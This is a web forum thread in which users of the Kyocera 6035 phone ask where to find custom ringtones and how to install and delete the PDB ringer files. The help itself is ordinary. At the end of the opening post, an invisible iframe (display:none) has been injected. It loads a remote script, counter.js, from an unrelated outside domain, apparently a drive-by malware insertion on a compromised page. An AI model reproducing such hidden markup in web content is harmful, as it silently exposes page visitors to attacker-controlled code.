+ Reply to Thread

We need a place for custom ring-tones!

I wish we had a place on this web site to upload the custom ringer sounds we've created. You'd think Kyocera's own site would have a place to do this, but all they have is musical ringers for other phones of theirs.

If anyone's ever used the ICQ instant messenger program, they probably noticed that there's a big collection of "sound themes" downloadable for it. A bunch of these .WAV sounds would translate well to ringer and pager noises for the 6035, in my opinion.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

booska
    yes i agree! i need some better ring tones. if this site doesn't host it, a collection of links would be great.

Folks,

There already is a place for ringer tones. Check '35 Site Files.

Plenty there.

tfischer
    Not exactly user-friendly, is it? Also, is there a link from anywhere to this files site?

I saw another site that had ring tones where you could click on each tone to sample it before downloading. This would be really cool. Same goes with logos, etc...

Just a thought (from someone who doesn't even have a 6035 yet :p).
    -Tim

webkrawlerr

How do we install?

Okay..I see some PRC files..and a bunch of PDB files...

How do we install the files?

I don't mean over the hotsync..but do I only install the PDB's
    or which PRC do I need as well, and then do I have to do anything on the Palm to get the tones to be recognized?

Thanx in advance

Re: How do we install?

[quote:48bac9f9e4][i:48bac9f9e4]Originally posted by webkrawlerr [/i:48bac9f9e4]
    [B]I don't mean over the hotsync..but do I only install the PDB's
    or which PRC do I need as well, and then do I have to do anything on the Palm to get the tones to be recognized?
    [/quote:48bac9f9e4]
    krawler,

You're probably gonna kick yourself after you read this, but hey take heart - we've all been there.

All you need to do is download the file you'fe looking for. In the case of the ringer tones they're all PDB files. So, for example, if you want to try out the silent ringer (silent.pdb) you download that file and either use the Palm Installer or, IMHO, even easier still use Pilot Install to get that file to your '35.

Once there silent.pdb will show up on the list of available ringers as "Silent".

Let us know if you need anything else.

webkrawlerr

Thanx :)

Thank you...

I'm heading home right now to give it a try

webkrawlerr

Too soft

I was able to get the tones downloaded...

I was dissapointed because most of them are so soft
    they are really not useful as ringers unless you
    are in a very quiet area...

But thanx for the help..

Microtec

But...

Hello All!

I just have one question about ringtones : how-to delete it ???

Thx!

Re: But...

[quote:dccd8d6b45][i:dccd8d6b45]Originally posted by Microtec [/i:dccd8d6b45]
    [B]Hello All!

I just have one question about ringtones : how-to delete it ???

Thx! [/quote:dccd8d6b45]

Microtec,

This is not a flame on you personally, but there really is a very good SEARCH capability on this site. I'm not going to provide the same answer I've provided on at least two other occasions, but you will be able to find those posts by:

1. Click on the "Search" button above.

2. Where it says "Search by Keyword" enter "ring and delete" without the quote marks.

3. Hit the enter key or click on "Perform Search" and I believe you will find SEVEN threads that include posts on deleting ringers.

Hope this will help all members.